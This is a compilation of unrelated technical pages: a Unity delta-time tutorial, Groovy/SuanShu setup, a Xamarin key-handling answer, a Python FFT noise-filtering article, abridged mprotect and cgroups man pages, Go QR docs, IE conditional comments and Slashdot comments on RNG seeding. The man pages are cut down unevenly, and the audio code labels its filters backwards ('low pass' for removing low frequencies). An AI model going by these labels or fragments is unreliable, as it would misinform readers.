If we had the difference in time since the last frame, we could multiply our vector by that difference to adjust the X value, giving a consistent movement speed across machines, regardless of their potential speed. As it turns out, we do have access to that delta! It's called delta time, and it's a static variable available on Unity's Time class. Let's check out the docs.

The docs say delta time is "the interval in seconds from the last frame to the current one". That's exactly what we need. We don't need to import a new namespace to use the Time class because it's part of UnityEngine, which we already have a using directive for on line 3.

// Update is called once per frame
void Update()
{
    transform.Translate(Vector3.right * Time.deltaTime);
}

Here's the result. Not as exciting as the cube racing off the screen, sure, but now we have framerate independence!

Multiplying Vectors

Let's talk about some simple math that's involved in this operation. What happens when we multiply a vector by another number? Each component of the vector is multiplied by the number. The product of the vector (1, 0, 0) and 0.5 would be (0.5, 0, 0), because 0.5 * 1 is 0.5 and any number multiplied by zero equals zero.

Variable Speed

We want the player to move a bit faster for our prototype, so let's create an easy way to add a variable speed that can be adjusted as we playtest the game and try different speed values. This is an important concept that we will reiterate several times through this series. When you think about working with people outside the engineering team, you want them to be able to playtest the game and make adjustments without contacting you every time they want to speed something up or slow it down. Unity has a mechanism to support editing variables in the editor, even while the game is running! We'll get into that soon. First, let's hard code a value to adjust the speed to get started. Let's go 5 times the speed. In order to do that, we need to add a multiplier like this.
// Update is called once per frame
void Update()
{
    transform.Translate(Time.deltaTime * 5 * Vector3.right);
}

Thanks to the commutative property of multiplication, we can rearrange the order of the factors and get the same result. I moved Time.deltaTime and our speed multiplier before Vector3.right because it requires fewer multiplication calls overall when ordered this way, since we end up with a single number to multiply across the vector's components (x, y, z).

Right now, we've hard coded the speed multiplier, which means if we ever need to change the value, we'll have to find this exact location and change it here. That should feel bad. Our literal value of 5 does not express our intent either. This is what we call a magic number. We are not just writing code for the computer; we are writing it for ourselves and our teammates. Therefore, I recommend writing code that expresses your intent to the best of your ability. Let's give this lonely number a name to express our intent. Scroll to the top of the file and add a public speed field of type float to the Player class.

public class Player : MonoBehaviour
{
    public float speed = 5.0f;
    ...
}

This creates a field that belongs to our Player class. It is public, which means that any other script in our game can access and modify the speed variable, which we don't want. We'll change the access modifier soon. We're using the data type float, which lets us represent floating-point decimal numbers, because we want floating-point precision when specifying values for our speed. Finally, we set the value to 5.0f, which might seem strange at first. Why do we suffix the literal value with an f? If you remove the f and go back to the Unity editor, you'll see it causes a compiler error with this message.
readonly struct System.Double
Literal of type double cannot be implicitly converted to type 'float'; use an 'F' suffix to create a literal of this type

This is telling us that the compiler doesn't know whether you intended for the value to resolve as a double or a float, so we add the f suffix to tell the compiler we intend for the value to be a float. Without going into a ton of detail about the double data type, just know that it is double the size of a float, which allows it to store a more precise number with more places after the decimal. You can read more about floating-point types in the docs.

Now let's replace that 5 with our new speed variable.

// Update is called once per frame
void Update()
{
    transform.Translate(Time.deltaTime * speed * Vector3.right);
}

Now for the real magic! Let's go back to the Unity editor and select the player in the hierarchy. Look in the inspector for the speed variable that we set to 5. Now you and other members of your team can change this value, and it will override what we set in code! However, the value will not persist if you change it while the game is running. If you change the value while the game is running, remember the value you want to keep and set it once you've stopped playing.

I said we would change the accessor for the speed variable, so let's do that now. I'm going to remove the public accessor, as the field will be private by default. Now we're going to have a problem. Since the field is private, no one else can access it, which means the Unity editor will not be able to let us change it from the inspector. Fear not: Unity knew there would need to be a solution to this, and they have provided it in the form of an attribute. In short, an attribute in C# is basically a way of describing some meta detail about the data we've applied the attribute to. The attribute we want to use above the speed field is called SerializeField, and it looks like this.

public class Player : MonoBehaviour
{
    [SerializeField]
    float speed = 5.0f;
    ...
}

With the speed variable now private, we've ensured that the data is encapsulated and controlled solely by the Player class, and by using the SerializeField attribute, we've let Unity know that we want our field to be serialized so the inspector has access to it. I'm going to leave the value at 5 for now, but feel free to experiment with the value for practice.

Summary

Now we have our player moving when the game starts, using framerate independence with delta time! It may not seem like much, but this is a lot to take in when you're just getting started. Make sure you understand what we've covered here and follow along for the next article, where we'll continue to build on these concepts.

Take care. Stay awesome.
https://blog.justinhhorner.com/player-movement-using-translate
SuanShu Scripting in Groovy

We can make Groovy into one all-powerful math computing environment for numerical analysis. Groovy is an object-oriented programming language for the Java platform. It is dynamically compiled to Java Virtual Machine bytecode and therefore inter-operates with SuanShu and other Java libraries. Most Java code is also syntactically valid Groovy. Groovy uses a Java-like but simplified syntax. For example, Groovy removes types (dynamic typing), semicolons (optional), and the return keyword (optional). If you already know Java, the learning effort will be minimal. Therefore, Groovy is a popular scripting language for the Java platform.

Setup

This section describes how to set up Groovy to use SuanShu for numerical computing.

1. You need a copy of suanshu.jar and a valid SuanShu license. You may download and purchase our products here.
2. Download the latest stable version of Groovy from the Groovy website, here.
3. Run the installer. When choosing the destination folder, please use one that contains no spaces or special characters. We recommend, for example, "C:\Groovy\Groovy-1.7.5".
4. Configure the environment variables as in the picture below.
5. Set up the environment variable JAVA_HOME to point to where your JDK is installed. For example, "C:\Program Files (x86)\Java\jdk1.6.0_20".
6. Create the Groovy ${user.home} folder. The user.home system property is set by your operating system. For example, it can be C:\Users\Haksun Li on Vista, or C:\Document and Settings\Haksun Li on XP. Create the folder ".groovy". Please note that when you rename on Windows, you need to type ".groovy." (with a "." at the end), otherwise Windows will complain (a bug?). Then create the "lib" folder in ".groovy".
7. Set up SuanShu. Copy and paste the SuanShu jar files, e.g., "suanshu.jar", into .groovy/lib. Copy the SuanShu license file "suanshu.lic" into .groovy.
8. Modify the Groovy shortcuts to start in the .groovy folder.
I created two shortcuts on the desktop: one for the Groovy shell (groovysh.exe) and another for the Groovy Console (GroovyConsole). The start-in folder is the current/working directory for Groovy. The SuanShu license management will look for the license file in the current directory.

9. Congratulations! You are now set up with Groovy and ready to go. You can start up the Groovy shell by double-clicking on groovysh.exe (or the shortcut you created). Type this to say 'hi':

println 'hi'

10. You may modify the properties of the shell screen by clicking on the Groovy icon at the upper left-hand corner. I changed mine to a white background and black font.

Tutorials

The best way to learn a language is by imitation and practice. We have prepared some examples to get you started on scripting SuanShu in Groovy. You may want to consult the references below to learn more about Groovy.

import

For those converting from Matlab/Octave/R/Scilab, the hardest thing to get used to is "import". To use any Java class in Groovy, we can type the fully qualified name, such as

com.numericalmethod.suanshu.matrix.doubles.dense.DenseMatrix

but then we need to do this every time we want to create a DenseMatrix, which is very cumbersome. Alternatively, we can declare the namespace of DenseMatrix by "importing" it once and for all:

import com.numericalmethod.suanshu.matrix.doubles.dense.DenseMatrix

Or, we can do

import com.numericalmethod.suanshu.matrix.doubles.dense.*

to import all classes in the package com.numericalmethod.suanshu.matrix.doubles.dense.

Although the keyword "import" saves some typing, it can get cumbersome if you need to import many classes. The Groovy shell partially solves this problem by letting users put their most often used imports in the shell startup script, "groovysh.rc". This file is found in the .groovy folder (or you can create one there). We recommend that SuanShu users include these imports; you can simply copy and paste to append them to your groovysh.rc.
http://numericalmethod.com/up/suanshu/scripting/groovy/
Xamarin Android: Handle Hardware Key in Spinner Dropdown

I've got an Android application written using Xamarin Android (not Xamarin Forms). It runs on a Zebra WT6000, which has hardware keys "P1" and "P2". By default, these are mapped to volume-down and volume-up (respectively). Within my application, I use these keys for other things (and provide an alternative way for the user to manage audio volume). This all works as intended.

My problem is that I have a spinner (Android.Widget.Spinner), and when the spinner is tapped and the dropdown appears, the default button mappings come back in force, ignoring the key handlers in my activity.

I have tried this:

MySpinner.KeyPress += (sender, evt) => { /* do a thing */ };

and also:

MySpinner.SetOnKeyListener(new KeyListener());
...
private class KeyListener : Java.Lang.Object, View.IOnKeyListener
{
    public bool OnKey(View v, [GeneratedEnum] Keycode keyCode, KeyEvent e)
    {
        // do a thing
        return true;
    }
}

However, neither my lambda function nor my OnKey() method ever gets called, and the key handling doesn't change. I suspect that the spinner's dropdown is its own DialogFragment (with its own key handling) rather than part of my activity. If so, I suspect I have to call the SetOnKeyListener() of that DialogFragment (rather than the SetOnKeyListener() of the spinner). Any suggestions would be most welcome.

1 answer - answered 2018-11-05 23:28 Douglas Henke

I found a way to do this (and by "way to do this" I mean "kludge"). The basic idea is that I have my own custom array adapter (derived from ArrayAdapter) to build the spinner rows. In its GetDropDownView() override, I set the KeyPress handler of the parent (where said parent is passed in as an argument). Code:

public class CustomArrayAdapter<T> : ArrayAdapter<T>
{
    private bool ParentKeyHandlerHasBeenSet;
    ...
    public override View GetDropDownView(int position, View convertView, ViewGroup parent)
    {
        if (!ParentKeyHandlerHasBeenSet && parent.Id == -1)
        {
            parent.KeyPress += (sender, evt) => { evt.Handled = true; };
            ParentKeyHandlerHasBeenSet = true;
        }
        return MyPrivateMethodThatBuildsTheView(...);
    }
}

That's obviously not a lovely, clean solution. If you have a better one, please share.
http://quabr.com/53162552/xamarin-android-handle-hardware-key-in-spinner-dropdown
Filtering a sound recording

Recently I was listening to an MP3 file of a talk about no-till gardening when I noticed that there was a noticeable buzz in the sound. I figured I would try my hand at sound filtering with Python as a learning experience.

The Python standard library doesn't have a module for reading mp3 files, but it can handle wav files. So I used the mpg123 program to convert the file:

mpg123 -w 20130509talk.wav 20130509talk.mp3

This is quite a big file, so I also extracted a somewhat smaller file for testing:

mpg123 -k 7000 -n 2400 -w input.wav 20130509talk.mp3

The interesting portion of this uncompressed stereo wav file is basically a list of 16-bit integers with the left and right channels interleaved. So let us first see how we read data from a wav file and split the values for the channels. All this is done using Python version 2.7, but 3.3 should work as well.

import wave
import numpy as np
import matplotlib.pyplot as plt

wr = wave.open('input.wav', 'r')
sz = 44100  # Read and process 1 second at a time.
da = np.fromstring(wr.readframes(sz), dtype=np.int16)
left, right = da[0::2], da[1::2]

The first three lines import the modules that we need for this code to work. The wave module is part of the standard library that comes with Python. The numpy (short for "numerical Python") and matplotlib modules have to be installed separately.

The wave.open() function opens the sound file, in this case for reading. The sound was sampled at 44.1 kHz; this is called the frame rate. I chose to analyse the sound in one-second chunks for reasons that I'll go into later. The readframes() method reads from the sound file and returns the data as a string. The fromstring() function from the numpy library converts the binary string into an array of 16-bit integers. The last line splits the array into the left and right channel arrays.

One of the standard ways to analyze sound is to look at the frequencies that are present in a sample.
The standard way of doing that is with a discrete Fourier transform, using the fast Fourier transform or FFT algorithm. What this basically does in this case is take a sound signal and isolate the frequencies of the sine waves that make up that sound. So we are going to use the np.fft.rfft() function, which is meant for data that doesn't contain complex numbers, just real numbers.

lf, rf = np.fft.rfft(left), np.fft.rfft(right)

The function np.fft.rfft() returns half as many numbers as it was given, plus one. This is because of the inherent symmetry in the transform: if the output array were just as long as the input, the second half would be a mirror image of the first half. So for 44100 samples, we get the intensity of the frequencies from 0 to 22050 Hz, which, not accidentally, covers the whole range that humans can hear.

Let's plot a figure of the sound and the frequencies of the left channel:

import matplotlib.pyplot as plt

plt.figure(1)
a = plt.subplot(211)
r = 2**16 / 2
a.set_ylim([-r, r])
a.set_xlabel('time [s]')
a.set_ylabel('sample value [-]')
x = np.arange(44100) / 44100.0  # float division; plain / would truncate to 0 on Python 2
plt.plot(x, left)
b = plt.subplot(212)
b.set_xscale('log')
b.set_xlabel('frequency [Hz]')
b.set_ylabel('|amplitude|')
plt.plot(abs(lf))
plt.savefig('sample-graph.png')

This figure is shown below. The top plot shows the typical combination of sine-wave structures of sound, but there is little there for us to see at first sight. The bottom plot is more interesting: it shows one big spike at and around 60 Hz. This is the frequency used for AC power in the USA, where the recording was made, and it was very noticeable in the recording. An AC circuit has two lines, power and neutral. Through damage in a wall or outlet the neutral wire can sometimes also carry a small amount of power; this reaches the microphone and is recorded. I made plots from several portions of the file, and this was the only big spike that was constantly there.
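A side note on why one-second chunks are convenient (this sketch is mine, not from the article): when the chunk length equals the sample rate, FFT bin k corresponds to exactly k Hz, so array indices can be read directly as frequencies.

```python
import numpy as np

sz = 44100  # samples per chunk == sample rate -> 1-second chunks
# rfftfreq gives the frequency (in Hz) of each rfft output bin.
freqs = np.fft.rfftfreq(sz, d=1.0 / sz)

# Bin k is exactly k Hz, so the 60 Hz mains hum sits at index 60.
print(freqs[60])   # 60.0
print(len(freqs))  # sz // 2 + 1 == 22051
```

This is exactly why a slice over indices 55..65 of the rfft output targets a band around 60 Hz.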
When recording using the built-in microphone on a laptop, a good way to prevent this is to disconnect the battery charger when recording.

The way to filter that sound is to set the amplitudes of the fft values around 60 Hz to 0, see (2) in the code below. In addition to filtering this peak, I'm also going to remove the frequencies below the human hearing range (1) and above the normal human voice range (3). Then we recreate the original signal via an inverse FFT (4).

lowpass = 21     # Remove lower frequencies.
highpass = 9000  # Remove higher frequencies.
lf[:lowpass], rf[:lowpass] = 0, 0    # low pass filter (1)
lf[55:66], rf[55:66] = 0, 0          # line noise filter (2)
lf[highpass:], rf[highpass:] = 0, 0  # high pass filter (3)
nl, nr = np.fft.irfft(lf), np.fft.irfft(rf)  # (4)
ns = np.column_stack((nl, nr)).ravel().astype(np.int16)

The last line combines the left and right channels again using the column_stack() function, interleaves the left and right samples using the ravel() method, and finally converts them to 16-bit integers with the astype() method.

Plotting the changed sound and fft data again produces the figure below. The big spike is now gone, as are the low and high tones. Looking back at the original and changed sound data, we can now see how the 60 Hz tone dominated the original sound data plot.

The resulting data can be converted to a string and written to a wav file again. This example was just for a one-second sound sample, so to convert a complete file we have to loop over the whole contents. The complete program used to filter the complete file is given below.

# compatibility with Python 3; must be the first statement in the file
from __future__ import print_function, division, unicode_literals

import wave
import numpy as np

# Created input file with:
# mpg123 -w 20130509talk.wav 20130509talk.mp3
wr = wave.open('20130509talk.wav', 'r')
par = list(wr.getparams())  # Get the parameters from the input.
# This file is stereo, 2 bytes/sample, 44.1 kHz.
par[3] = 0  # The number of samples will be set by writeframes.

# Open the output file.
ww = wave.open('filtered-talk.wav', 'w')
ww.setparams(tuple(par))  # Use the same parameters as the input file.

lowpass = 21     # Remove lower frequencies.
highpass = 9000  # Remove higher frequencies.

sz = wr.getframerate()  # Read and process 1 second at a time.
c = int(wr.getnframes()/sz)  # whole file
for num in range(c):
    print('Processing {}/{} s'.format(num+1, c))
    da = np.fromstring(wr.readframes(sz), dtype=np.int16)
    left, right = da[0::2], da[1::2]  # left and right channel
    lf, rf = np.fft.rfft(left), np.fft.rfft(right)
    lf[:lowpass], rf[:lowpass] = 0, 0    # low pass filter
    lf[55:66], rf[55:66] = 0, 0          # line noise
    lf[highpass:], rf[highpass:] = 0, 0  # high pass filter
    nl, nr = np.fft.irfft(lf), np.fft.irfft(rf)
    ns = np.column_stack((nl, nr)).ravel().astype(np.int16)
    ww.writeframes(ns.tostring())

# Close the files.
wr.close()
ww.close()

This technique works pretty well for these kinds of disturbances, i.e. those that are very localized in the frequency domain. During part of the talk there is a noticeable sound of rushing air, which I suspect came from an air-conditioning unit or a laptop's cooling fan. This gave no noticeable single big spike. There were some smaller spikes, but filtering those out wasn't sufficient to eliminate the noise, probably because the sound was composed of multiple harmonics. Additionally, those spikes were in the frequency range of the normal spoken voice, so filtering them affected the talk too much.
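To convince yourself that zeroing a band of rfft bins really removes a hum without touching nearby content, here is a small self-contained check on synthetic data. The 440 Hz tone and the amplitudes are invented for the demonstration; this is not from the original recording.

```python
import numpy as np

rate = 44100
t = np.arange(rate) / float(rate)
# One second of a 440 Hz "voice" tone plus a 60 Hz mains hum.
signal = (8000 * np.sin(2 * np.pi * 440 * t) +
          4000 * np.sin(2 * np.pi * 60 * t)).astype(np.int16)

spec = np.fft.rfft(signal)
spec[55:66] = 0                  # the same notch used in the article
filtered = np.fft.irfft(spec)

clean = np.fft.rfft(filtered)
print(abs(clean[60]) < 1)        # True: the hum bin is (numerically) zero
print(abs(clean[440]) > 1e6)     # True: the tone is untouched
```

Because the tone completes a whole number of cycles in the one-second window, its energy sits in a single bin, which makes the before/after comparison unambiguous.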
http://rsmith.home.xs4all.nl/miscellaneous/filtering-a-sound-recording.html
MPROTECT(2)                BSD Programmer's Manual                MPROTECT(2)

NAME
     mprotect - control the protection of pages

SYNOPSIS
     #include <sys/types.h>
     #include <sys/mman.h>

     int mprotect(void *addr, size_t len, int prot);

DESCRIPTION
     The mprotect() system call changes the specified pages to have protection
     prot. Not all implementations will guarantee protection on a page basis;
     the granularity of protection changes may be as large as an entire
     region. The protections (region accessibility) are specified in the prot
     argument by OR'ing the following values:

     PROT_EXEC    Pages may be executed.
     PROT_READ    Pages may be read.
     PROT_WRITE   Pages may be written.
     PROT_NONE    No permissions.

RETURN VALUES
     Upon successful completion, a value of 0 is returned. Otherwise, a value
     of -1 is returned and errno is set to indicate the error.

SEE ALSO
     madvise(2), mincore(2), msync(2), munmap(2)

HISTORY
     The mprotect() function first appeared in 4.4BSD.
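As a quick illustration of the call described above (a sketch, not part of the manual), Python's ctypes can invoke mprotect() on an anonymous mapping. This assumes a Unix-like system where ctypes.CDLL(None) exposes the C library's symbols.

```python
import ctypes
import mmap

# Assumption: a Unix-style libc reachable via CDLL(None).
libc = ctypes.CDLL(None, use_errno=True)

PAGESIZE = mmap.PAGESIZE

# Map one anonymous page, initially readable and writable.
buf = mmap.mmap(-1, PAGESIZE, prot=mmap.PROT_READ | mmap.PROT_WRITE)
addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))

# Drop write permission on the page; reading is still allowed.
ret = libc.mprotect(ctypes.c_void_p(addr), ctypes.c_size_t(PAGESIZE),
                    mmap.PROT_READ)
first = buf[0]  # still readable; an anonymous page reads as zeros

# Restore read/write so the mapping can be used normally again.
ret = libc.mprotect(ctypes.c_void_p(addr), ctypes.c_size_t(PAGESIZE),
                    mmap.PROT_READ | mmap.PROT_WRITE)
```

Both calls return 0 on success, matching the RETURN VALUES section; writing to the page between the two calls would instead fault, since PROT_WRITE had been removed.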
https://www.mirbsd.org/htman/i386/man2/mprotect.htm
import "rsc.io/qr/coding" Package coding implements low-level QR coding details. Field is the field for QR error correction. Alpha is the encoding for alphanumeric data. The valid characters are 0-9A-Z$%*+-./: and space. type Code struct { Bitmap []byte // 1 is black, 0 is white Size int // number of pixels on a side Stride int // number of bytes per row } A Code is a square pixel grid. Encoding implements a QR data encoding scheme. The implementations--Numeric, Alphanumeric, and String--specify the character set and the mapping from UTF-8 to code bits. The more restrictive the mode, the fewer code bits are needed. A Level represents a QR error correction level. From least to most tolerant of errors, they are L, M, Q, H. A Mask describes a mask that is applied to the QR code to avoid QR artifacts being interpreted as alignment and timing patterns (such as the squares in the corners). Valid masks are integers from 0 to 7. Num is the encoding for numeric data. The only valid characters are the decimal digits 0 through 9. A Pixel describes a single pixel in a QR code. A PixelRole describes the role of a QR pixel. const ( Position PixelRole // position squares (large) Alignment // alignment squares (small) Timing // timing strip between position squares Format // format metadata PVersion // version pattern Unused // unused pixel Data // data bit Check // error correction check bit Extra ) type Plan struct { Version Version Level Level Mask Mask DataBytes int // number of data bytes CheckBytes int // number of error correcting (checksum) bytes Blocks int // number of data blocks Pixel [][]Pixel // pixel map } A Plan describes how to construct a QR code with a specific version, level, and mask. NewPlan returns a Plan for a QR code with the given version, level, and mask. String is the encoding for 8-bit data. All bytes are valid. A Version represents a QR version. The version specifies the size of the QR code: a QR code with version v has 4v+17 pixels on a side. 
Versions number from 1 to 40: the larger the version, the more information the code can store. DataBytes returns the number of data bytes that can be stored in a QR code with the given version and level. Package coding imports 4 packages and is imported by 9 packages. Updated 2018-07-12.
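The size rule quoted above (a version-v QR code has 4v+17 pixels on a side) is easy to tabulate; this sketch is mine, in Python rather than Go, purely to illustrate the arithmetic.

```python
def qr_size(version):
    """Pixels (modules) per side for a QR code of the given version."""
    if not 1 <= version <= 40:
        raise ValueError("QR versions run from 1 to 40")
    return 4 * version + 17

print(qr_size(1))   # 21  (the smallest QR code)
print(qr_size(40))  # 177 (the largest)
```

Versions 1 and 40 give the two extremes, 21 and 177 modules per side, which is why higher versions can store more information.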
https://godoc.org/rsc.io/qr/coding
I am trying to target a particular styling for all browsers except for ie9 and below. I did this to target IE9 and below: <!--[if lte IE 9]> <link rel="stylesheet" href="css/ie/ie.min.css"> <![endif]--> <!--[if lt IE 9]> <link rel="stylesheet" href="css/ie/ie.min.css"> <![endif]--> <!--[if IE 9]> <link rel="stylesheet" href="css/ie/ie-9.min.css"> <![endif]--> <!--[if gt IE 9]><!--> <link rel="stylesheet" href="css/normal.min.css"> <!--<![endif]--> This method should provide you with separate stylesheets for less than IE 9, IE 9, and more than IE 9 (including all non-IE browsers). The trick for the last conditional is <!--> and <!--<!, which cause Edge and non-IE browsers to interpret the if and endif as separate comments. To target a single version in particular, use <!--[if IE #]>. As pointed out by jkdev, since IE 9 is the last version to support conditional comments, the last conditional could have been written: <!--[if !IE]><!--> <link rel="stylesheet" href="css/normal.min.css"> <!--<![endif]--> The result would be the same as the first snippet: only IE 10-11, Edge, and non-IE browsers would get css/normal.min.css. None of the earlier IE versions would get this file since they would evaluate if !IE. See also Conditional comments for Internet Explorer.
https://codedump.io/share/uKg98wlMMfAS/1/how-do-i-target-css-styling-to-other-browsers-except-for-ie9
cgroups man page

cgroups — Linux control groups

Description

Control groups, usually referred to as cgroups, are a Linux kernel feature which allow processes to be organized into hierarchical groups whose usage of various types of resources can then be limited and monitored.

Terminology

A cgroup is a collection of processes that are bound to a set of limits or parameters defined via the cgroup filesystem. A subsystem is a kernel component that modifies the behavior of the processes in a cgroup; subsystems are sometimes also known as resource controllers (or simply, controllers).

Cgroups version 1 and version 2

The initial release of the cgroups implementation was in Linux 2.6.24. (Documentation for the newer implementation can be found in the kernel source file Documentation/cgroup-v2.txt.) Because of the problems with the initial cgroups implementation (cgroups version 1), starting in Linux 3.10, work began on a new, orthogonal implementation to remedy these problems. Initially marked experimental, and hidden behind the -o __DEVEL__sane_behavior mount option, the new implementation was eventually made official with the release of Linux 4.5, in the form of cgroups version 2.

Cgroups version 1

Under cgroups v1, each controller may be mounted against a separate cgroup filesystem that provides its own hierarchical organization of the processes on the system. It is also possible to comount multiple controllers against the same hierarchy. In addition, in cgroups v1, cgroups can be mounted with no bound controller, in which case they serve only to track processes. (See the discussion of release notification below.) An example of this is the name=systemd cgroup which is used by systemd(1) to track services and user sessions.

Tasks (threads) versus processes

In cgroups v1, it is possible to independently manipulate the cgroup memberships of the threads in a process. Because this ability caused certain problems, it has been removed in cgroups v2. Cgroups v2 allows manipulation of cgroup membership only for processes (which has the effect of changing the cgroup membership of all threads in the process).

Mounting v1 controllers

To be available, a given v1 controller must be mounted against a cgroup filesystem:

mount -t cgroup -o cpu none /sys/fs/cgroup/cpu

It is possible to comount multiple controllers against the same hierarchy. For example, here the cpu and cpuacct controllers are comounted against a single hierarchy:

mount -t cgroup -o cpu,cpuacct none /sys/fs/cgroup/cpu,cpuacct

It is also possible to comount all v1 controllers against the same hierarchy:

mount -t cgroup -o all cgroup /sys/fs/cgroup

(One can achieve the same result by omitting -o all, since it is the default if no controllers are explicitly specified.)

Cgroups version 1 controllers

- cpuacct (since Linux 2.6.24; CONFIG_CGROUP_CPUACCT) This provides accounting for CPU usage by groups of processes. Further information can be found in the kernel source file Documentation/cgroup-v1/cpuacct.txt.
- devices (since Linux 2.6.26; CONFIG_CGROUP_DEVICE) This supports controlling which processes may create (mknod) devices as well as open them for reading or writing; the policies may be specified as whitelists and blacklists.

Creating cgroups and moving processes

A cgroup filesystem initially contains a single root cgroup, '/', to which all processes belong. A new cgroup is created by creating a directory in the cgroup filesystem, and a process is moved into a cgroup by writing its PID into the cgroup's cgroup.procs file. In cgroups v1 (but not cgroups v2), each cgroup directory additionally contains a tasks file that can be used to move individual threads between cgroups; this file is not present in cgroup v2 directories.

Removing cgroups

To remove a cgroup, it must first have no child cgroups and contain no (nonzombie) processes; the cgroup is then removed by removing its directory with rmdir(2).
Cgroups v1 release notification

Two files, release_agent and notify_on_release, can be used to arrange for the kernel to run a program when a cgroup becomes empty (that is, when it no longer contains any member processes or child cgroups). The default value of the release_agent file is empty, meaning that no release agent is invoked.

Cgroups version 2

In cgroups v2, all mounted controllers reside in a single unified hierarchy. Among the differences from cgroups v1:

1. Cgroups v2 provides a unified hierarchy against which all controllers are mounted.
2. "Internal" processes are not permitted. With the exception of the root cgroup, processes may reside only in leaf nodes (cgroups that do not themselves contain child cgroups).

Cgroups v2 unified hierarchy

In cgroups v1, the ability to mount different controllers against different hierarchies was intended to allow great flexibility for application design. In practice, though, the flexibility turned out to be less useful than expected, and in many cases added complexity.

Cgroups v2 subtree control

When a cgroup A/b is created, its cgroup.controllers file contains the list of controllers which were active in its parent, A. This is the list of controllers which are available to this cgroup. No controllers are active until they are enabled through the cgroup.subtree_control file, by writing the list of space-delimited names of the controllers, each preceded by '+' (to enable) or '-' (to disable). If the freezer controller is not enabled in /A/B, then it cannot be enabled in /A/B/C.

Cgroups v2 cgroup.events file

With cgroups v2, a new mechanism is provided to obtain notification about when a cgroup becomes empty. The cgroups v1 release_agent and notify_on_release files are removed, and replaced by a new, more general-purpose file, cgroup.events. Changes to this file generate POLLPRI events, so it can be monitored with poll(2) and similar interfaces.

/proc files

/proc/cgroups (since Linux 2.6.24) This file contains information about the controllers that are compiled into the kernel. Each record contains four fields:

1. The name of the controller.
2. The unique ID of the cgroup hierarchy on which this controller is mounted. If multiple cgroups v1 controllers are bound to the same hierarchy, then each will show the same hierarchy ID in this field.
The value in this field will be 0 if:

a) the controller is not mounted on a cgroups v1 hierarchy;
b) the controller is bound to the cgroups v2 single unified hierarchy; or
c) the controller is disabled (see below).

3. The number of control groups in this hierarchy using this controller.
4. This field contains the value 1 if this controller is enabled, or 0 if it has been disabled (via the cgroup_disable kernel command-line boot parameter).

/proc/[pid]/cgroup (since Linux 2.6.24) This file describes the control groups to which the process with the corresponding PID belongs. For each cgroup hierarchy of which the process is a member, there is one record containing three colon-separated fields of the form:

hierarchy-ID:controller-list:cgroup-path

1. For cgroups version 1 hierarchies, this field contains a unique hierarchy ID number that can be matched to a hierarchy ID in /proc/cgroups. For the cgroups version 2 hierarchy, this field contains the value 0.
2. For cgroups version 1 hierarchies, this field contains a comma-separated list of the controllers bound to the hierarchy. For the cgroups version 2 hierarchy, this field is empty.
3. This field contains the pathname of the control group in the hierarchy to which the process belongs. This pathname is relative to the mount point of the hierarchy.

Errors

The following errors can occur for mount(2):

EBUSY  An attempt to mount a cgroup version 1 filesystem specified neither the name= option (to mount a named hierarchy) nor a controller name (or all).

Notes

A child process created via fork(2) inherits its parent's cgroup memberships. A process's cgroup memberships are preserved across execve(2).

See Also

prlimit(1), systemd(1), systemd-cgls(1), systemd-cgtop(1), clone(2), ioprio_set(2), perf_event_open(2), setrlimit(2), cgroup_namespaces(7), cpuset(7), namespaces(7), sched(7), user_namespaces(7)

Colophon

This page is part of release 4.13 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at.

Referenced By

cgroup_namespaces(7), cpuset(7), getrlimit(2), ioprio_set(2), namespaces(7), poll(2), proc(5), sched(7), sysfs(5), systemd.exec(5).
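The /proc/[pid]/cgroup records described in this page carry three colon-separated fields (hierarchy ID, controller list, cgroup path) and can be parsed mechanically. This sketch is mine, not part of the man page; the sample lines are typical of a host with both v1 and v2 hierarchies mounted.

```python
def parse_cgroup_line(line):
    """Split one /proc/[pid]/cgroup record into (hierarchy_id, controllers, path)."""
    # Split on at most two colons: the cgroup path itself never needs splitting.
    hier, controllers, path = line.rstrip("\n").split(":", 2)
    return int(hier), controllers.split(",") if controllers else [], path

# Typical records: a v1 cpu,cpuacct hierarchy and the v2 unified hierarchy.
print(parse_cgroup_line("4:cpu,cpuacct:/user.slice"))  # (4, ['cpu', 'cpuacct'], '/user.slice')
print(parse_cgroup_line("0::/init.scope"))             # (0, [], '/init.scope')
```

The second record shows the v2 conventions described above: hierarchy ID 0 and an empty controller list.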
https://www.mankier.com/7/cgroups
Another advantage for TPM chips... (Score:4, Informative) TPM chips have their bad things, but one thing they do offer is a cryptographically secure RNG. It's completely understandable not to trust it 100%, but you can use the random number stream it puts out as a good addition to the /dev/random number pool. Re:Another advantage for TPM chips... (Score:5, Insightful) Or you could plug in a microphone. Any USB device (Score:2) Or you could plug in a microphone. Assign all of the virtual servers a unique 256 bit ID. XOR that with 256 bits of input of any USB device that measures the real world, and send it through a hash algorithm. USB devices are easy for virtual servers to access. Perhaps better, have a 256 bit seed for each server as above, but have the host server distribute 256 bits at startup time using a microphone run through a hash algorithm. Build one of these (Score:2) Re: (Score:2) Unless you wanted all of the servers (and all of the VMs on each server) to have *different* entropy sources, which was the whole point of TFA. Unless you run a lot of single-device racks each in their own room you're just going to end up with an expensive way to get exactly the same "random" data on each machine. There's also some correlation between things like disk activity and sound output of the machine; there may be some entropy available in the ambient sound -- it may even be chaotic -- but it's certa Re: (Score:2) Re:Another advantage for TPM chips... (Score:5, Insightful) First, real-world images are not very random just by virtue of being part of the real world; random things also need to happen. This is particularly true of mostly-static images like you'd see in 24/7 web cams -- there is not much entropy available. Second, most of the reason we want random data for seeding purposes is because the seed needs to be something an attacker cannot derive.
The output of a truly random number generator cannot be predicted by a remote attacker, but publicly available video streams most certainly can, so any source that sends the same data to more than one person is not suitable for things like cryptography. Frankly that's the whole point of the article; if there are many VMs on the same host, or many real hosts on the same hardware and network, started at the same time, and using the same source for entropy, they will all generate the same "random" number. Finally, this is a well-solved problem. Many CPUs and motherboards include a hardware RNG that is perfectly sufficient both in terms of randomness and speed for typical PRNG seeding needs. VIA has had one directly in all their CPUs for a long time, Intel includes one in their firmware hubs, and I'm sure there are similar options on most other architectures. Using that on-board RNG to individually seed each VM/host would solve the problem described in the article. There's no reason to try to invent ways to get random data unless you have very specific requirements not met by the existing solutions, as you're quite likely to come up with something inferior either in design or implementation. Re: (Score:2) The Eiffel tower hasn't changed that much in the past 110 years... The MIT (IIRC) used to have a random data feed generated from a webcam and a lava lamp. I guess each datacenter ought to invest in a lava lamp... Correction: after a quick Google, it seems that it was SGI [wired.com], and that they actually patented the thing (which may or may not mean something depending on your jurisdiction). The site was (and still is apparently) lavarnd.org [lavarnd.org].
